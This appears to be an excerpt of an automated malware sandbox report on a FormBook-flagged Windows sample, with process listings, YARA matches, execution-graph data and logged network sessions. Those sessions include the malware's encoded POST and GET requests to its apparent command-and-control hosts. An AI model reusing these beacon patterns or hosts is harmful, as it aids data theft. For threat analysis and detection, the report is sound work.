                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07l7O1Z%2BsYyq6aQ1OFewzfj5DVpqiKtNwxrcxRHCa2ecqHy56MzZ7QbPTmwHmI3F2zjuDNKSx21STyNGZMumQ3bOgUL8PFNLtregVyTY508Bf%2BGgo39psVDvncNE2H2puQI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 9002418afdc4421b-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1685&rtt_var=842&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.10 | 50007 | 104.21.48.233 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:45:14.956047058 CET | 822 | OUT | POST /p9tq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.ausyva4.top
                                                            Origin: http://www.ausyva4.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.ausyva4.top/p9tq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=7kEXR1BJ94/4gReXC1aniULP6ZW73gzA/v9EXBYBuDVo/tIlJ1e19Td8Z6qWdtCZ55EUDdbrX7wvdv9/WMKHXrNgTQgjDh/i2azj+zv5cE2UBDfWhCubQ+aXa7cb8RqbEWJcEi7O4Vhi37leJ5z72mXMRcbe/57CtrqQ+WX5sbW4BQBwB+mcM+KdQsszrMaB1WiqusDjj6UAO/PpvA==
Jan 11, 2025 05:45:15.557960987 CET | 814 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:45:15 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLJG4ERKv2orYNq5xmGT9P4mGenCh8B0x3gLA1w2CzWGSpYauqq1ahAeFym4JgdKwdxZRh3Brf%2FIGXLxP8tVC6tK1LZ8hVM6yBM19mdzsNMIT%2BxTMu3YK5qJ9C5kLyS%2BB%2B0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 9002419b0fbd4308-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1869&min_rtt=1869&rtt_var=934&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                            Data Ascii: f
Jan 11, 2025 05:45:15.558871031 CET | 355 | IN | Data Raw: 31 35 37 0d 0a 75 91 41 6b 02 31 10 85 ef 82 ff 61 ec 5d c7 15 3d 54 42 0e 55 4b 0b d6 4a bb 42 7b 8c 66 34 a1 6b 66 9b 9d 75 d9 7f 5f 5c dd 22 85 5e f2 32 99 f9 1e 13 9e ea cd 5f 67 e9 e7 7a 01 4f e9 cb 12 d6 9b 87 e5 f3 0c ee fa 88 cf 8b f4 11


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.10 | 50008 | 104.21.48.233 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:45:17.516024113 CET | 1835 | OUT | POST /p9tq/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.ausyva4.top
                                                            Origin: http://www.ausyva4.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.ausyva4.top/p9tq/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Jan 11, 2025 05:45:18.138160944 CET | 1157 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:45:18 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t99bqS8oMzQ9S83d9eLzkG12Tr0QFTSXlA5PF7jQINtEOtCEVByqjLQf%2BHoN5tNgJf6BUNWHA7CUFukKZneYl3SS5nkdlAlwRSZ9MsO1ljiRXKpDu2jBtCFGHMNiHi%2F3rUU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 900241aaec927cb2-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1972&rtt_var=986&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1835&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.10 | 50009 | 104.21.48.233 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:45:20.058527946 CET | 540 | OUT | GET /p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.ausyva4.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Jan 11, 2025 05:45:20.653219938 CET | 770 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:45:20 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYVp%2FBFZg2upHdZZbJSjQG8TgOQYgE3IPO1nBVakurEWbUDSKajLi7XVa5Wqts4D8iH%2Fg9BcX%2FGoKeTVY806iokxUo%2FmooNkb37U7IrqsFE2Z5DmM2tf2Cqzmq4FlRlyFRY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 900241bada3d4381-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=540&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 05:45:20.654582977 CET | 716 | IN | Data Raw: 32 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20
                                                            Data Ascii: 2c0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the followi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.10 | 50010 | 3.252.97.86 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:45:25.710680962 CET | 789 | OUT | POST /hhdc/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.e8af.xyz
                                                            Origin: http://www.e8af.xyz
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.e8af.xyz/hhdc/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=rnHSPUony07YsdzLh3UmqUkZAA4PksnNcVzY/e/YOX6Okg1vFZ+JexyX5EnuvxQGabI8vi7sO0Ez+D8pOKr4Zx6QU/Dycar1OaifZZI4G8EgmgQ/t3oI3iKVUOw8f+gxkqtmxme++Huc+MdUUHZfod8wRW6aEgtA7Y3LVI+Kn1QhDsSA4R+HWeDvfFkF
Jan 11, 2025 05:45:26.366406918 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Sat, 11 Jan 2025 04:45:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Trace: 2BB6D4FF7B1BE172E068A73EB96D74D7700BEE5DF204EC677DD43B7AC000
                                                            Set-Cookie: _csrf=51cc0992ea1d7f7564af0ff2474a74decfe4864b45730fe918c859a9331e91f8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ot6xu2IKvk7J3KjRQi7HEvEgIdu79Hhi%22%3B%7D; path=/; HttpOnly
                                                            Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="dvNhikub7jfd7dZqUP08rcEdK60oGpnGJqki7CTQ_mIZh1fyPqmnfKuG4SBjtlb_kHQc5W1s3KFvzVfbHZiWCw=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></di
Jan 11, 2025 05:45:26.366444111 CET | 27 | IN | Data Raw: 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: v></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
30 | 192.168.2.10 | 50011 | 3.252.97.86 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:45:28.833187103 CET | 813 | OUT | POST /hhdc/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.e8af.xyz
                                                            Origin: http://www.e8af.xyz
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.e8af.xyz/hhdc/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=rnHSPUony07Yu9DLyksmo0kaPg4PvMnBcVPY/cSFJiSOjExvEY+JOhyXqEn3hRQRabEOvjHsO0gz+GYpN9H7Yh6SNPDwYar1OaifZZcSG8MgmTI/tVAP+CKaVOw8UegLkqt+xkrj+Fmc+J5UVS1eid97f27XD10LzYb3cJiS/HY9ANvHpAfQFpfhRDRvfO/BkekrSa3gkZ4F6262eQ==
                                                            Jan 11, 2025 05:45:29.508373022 CET  1236  IN  HTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Sat, 11 Jan 2025 04:45:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Trace: 2B0E8ABB617BD9862FFF8B999087830FF1EE3C5463E5355DA0E5584D0700
                                                            Set-Cookie: _csrf=ef877f69cc5ba2c61962b228895ee8b00dade9de4a0aab81822e4f67c9f925aea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%224ke5O3JzvbJhBZdkbBxELmWJGKDfoojW%22%3B%7D; path=/; HttpOnly
                                                            Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="-CqawJUWbx-2qqXU-sRmpURDY6jEu7Z75sp1nYfUerzMQf_12iUlZcDI77y4ngLOJgEb7YjW4TGhgTH76LsQ6w=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></di
                                                            Jan 11, 2025 05:45:29.508429050 CET  27  IN  Data Raw: 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: v></body></html>0


                                                            Target ID:5
                                                            Start time:23:42:20
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\wSoShbuXnJ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\wSoShbuXnJ.exe"
                                                            Imagebase:0x240000
                                                            File size:834'560 bytes
                                                            MD5 hash:FEEA3EB7D321AC0FF06D81683AC140ED
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:23:42:35
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\wSoShbuXnJ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\wSoShbuXnJ.exe"
                                                            Imagebase:0x8b0000
                                                            File size:834'560 bytes
                                                            MD5 hash:FEEA3EB7D321AC0FF06D81683AC140ED
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:23:43:04
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe"
                                                            Imagebase:0xd00000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:11
                                                            Start time:23:43:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\finger.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                            Imagebase:0x800000
                                                            File size:13'824 bytes
                                                            MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:12
                                                            Start time:23:43:18
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe"
                                                            Imagebase:0xd00000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:16
                                                            Start time:23:43:30
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff613480000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:9.4%
                                                              Dynamic/Decrypted Code Coverage:81.4%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:43
                                                              Total number of Limit Nodes:3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              • Opcode ID: 8079d1a1611188200371c40b57c04b3c856087251d9e0586ceca36a807555538
                                                              • Instruction ID: d30c22618ba470a86d45285d6977ad09cd05d246411739bb7c5d8dc12e7d3e14
                                                              • Opcode Fuzzy Hash: 8079d1a1611188200371c40b57c04b3c856087251d9e0586ceca36a807555538
                                                              • Instruction Fuzzy Hash: 63229E70E14214CFDBA4CFA8D444ABEB7F2FF88310F14856EE456AB296D7749881CB91
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d13c016d9697e44a2e315d0d5abb021fb9e86572f9ed39b2e475642d3f606f9
                                                              • Instruction ID: fbeadf5c53e8000fe9a980a98432d618f63ff3655e77fb21d64f0e2044588894
                                                              • Opcode Fuzzy Hash: 6d13c016d9697e44a2e315d0d5abb021fb9e86572f9ed39b2e475642d3f606f9
                                                              • Instruction Fuzzy Hash: 41D1A274A002099FDB44DFA9C590A9EFBF2FF88304F2582A5D408AB355DB71AD91CF94
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 482666cbd39f0a9410f6995553deb1e9a38543f1cb5888813697d982452bd507
                                                              • Instruction ID: 2b4463a1264474eee11294dff57fc86ab385e211c289503bece4a05e5559a44f
                                                              • Opcode Fuzzy Hash: 482666cbd39f0a9410f6995553deb1e9a38543f1cb5888813697d982452bd507
                                                              • Instruction Fuzzy Hash: DF819175E012488FDB04DFA9C594AEEBBF2BF88300F24816AD409AB365DB759D45CF50

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0248B446
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: b742cbbe08f0668dff04facae47467706abfa8839d8c15a6b1556ccaefe8646d
                                                              • Instruction ID: 63e602296814f96a0fd5a2973c61c8ee90dba1a94dbd2e807ea428e6331cd280
                                                              • Opcode Fuzzy Hash: b742cbbe08f0668dff04facae47467706abfa8839d8c15a6b1556ccaefe8646d
                                                              • Instruction Fuzzy Hash: 9C811270A10B058FEB24EF6AD45475ABBF1FF88208F108A2ED44ADBB50D775E845CB91

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 024859C9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 1d05d6d613c9505868ae7b32883bafde43e4facd86fe406933396c985f1296a2
                                                              • Instruction ID: e883282f1b3abd938d154564d0c1d8dc84a043f0f0a9adf5f9abf7aa0cc3ebab
                                                              • Opcode Fuzzy Hash: 1d05d6d613c9505868ae7b32883bafde43e4facd86fe406933396c985f1296a2
                                                              • Instruction Fuzzy Hash: 8741D2B1C01719CBEB24DFA9C884BCEBBF5BF48304F60806AD419AB251D775694ACF90

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 024859C9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 61a0d9870470896934905272837f34067cf22c15bbd113f854fe99c47515c470
                                                              • Instruction ID: 7bf5044d64bf27ef3ea9d00a7d4d780b70e71cb9b3545ac260f48f6f94b6c65d
                                                              • Opcode Fuzzy Hash: 61a0d9870470896934905272837f34067cf22c15bbd113f854fe99c47515c470
                                                              • Instruction Fuzzy Hash: D141D2B1C1071DCBEB24DFA9C884BDEBBB5BF48304F60805AD408AB251D775694ACF90

                                                              Control-flow Graph

                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 067C0497
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: b7a075d071b787e9cf3a3b626f4b71a362adc183586ceb65e32ad2500ed5817f
                                                              • Instruction ID: a57d8b189c8168f78cabbb65a8c820bb6689f038df470598fe3bbbfbe457d3a1
                                                              • Opcode Fuzzy Hash: b7a075d071b787e9cf3a3b626f4b71a362adc183586ceb65e32ad2500ed5817f
                                                              • Instruction Fuzzy Hash: 2A31C6B5D01349DFDB10CF9AD884A9EBBF5FB58320F14842EE819A7210D3759545CFA0

                                                              Control-flow Graph

                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 067C0497
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: c5688ea9ba272d493b9f959f5c736ea6b427371375a2f9d59516448ffc5e79f3
                                                              • Instruction ID: 9c6bb7a56efecd7f4d07252eda3d193338546efae90e64f1038666e285f1d2a1
                                                              • Opcode Fuzzy Hash: c5688ea9ba272d493b9f959f5c736ea6b427371375a2f9d59516448ffc5e79f3
                                                              • Instruction Fuzzy Hash: EE21C2B5D002099FDB10CF9AD884AAEBBF4EB58320F14842EE919A7210D375A945CFA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 344 248cd80-248d754 DuplicateHandle 346 248d75d-248d77a 344->346 347 248d756-248d75c 344->347 347->346
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0248D686,?,?,?,?,?), ref: 0248D747
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
